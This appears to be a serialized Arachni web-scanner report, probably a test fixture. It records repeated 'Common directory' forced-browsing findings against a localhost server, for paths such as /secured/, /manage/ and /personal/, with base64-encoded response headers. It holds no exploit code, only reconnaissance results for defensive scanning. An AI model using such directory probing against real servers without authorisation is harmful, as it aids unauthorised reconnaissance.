http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/temp/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/temp/ injected: temp id: temp elem: path remarks: {} method: '' response: temp headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/code/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/code/ injected: code id: code elem: path remarks: {} method: '' response: code headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/secured/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/secured/ injected: secured id: secured elem: path remarks: {} method: '' response: secured headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/staff/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/staff/ injected: staff id: staff elem: path remarks: {} method: '' response: staff headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/src/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/src/ injected: src id: src elem: path remarks: {} method: '' response: src headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/manage/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/manage/ injected: manage id: manage elem: path remarks: {} method: '' response: manage headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/personal/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/personal/ injected: personal id: personal elem: path remarks: {} method: '' response: personal headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/publish/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/publish/ injected: publish id: publish elem: path remarks: {} method: '' response: publish headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/system/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/system/ injected: system id: system elem: path remarks: {} method: '' response: system headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/work/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/work/ injected: work id: work elem: path remarks: {} method: '' response: work headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/tests/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/tests/ injected: tests id: tests elem: path remarks: {} method: '' response: tests headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/stuff/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/stuff/ injected: stuff id: stuff elem: path remarks: {} method: '' response: stuff headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/update/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/update/ injected: update id: update elem: path remarks: {} method: '' response: update headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/share/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/share/ injected: share id: share elem: path remarks: {} method: '' response: share headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/tools/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/tools/ injected: tools id: tools elem: path remarks: {} method: '' response: tools headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/email/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/email/ injected: email id: email elem: path remarks: {} method: '' response: email headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
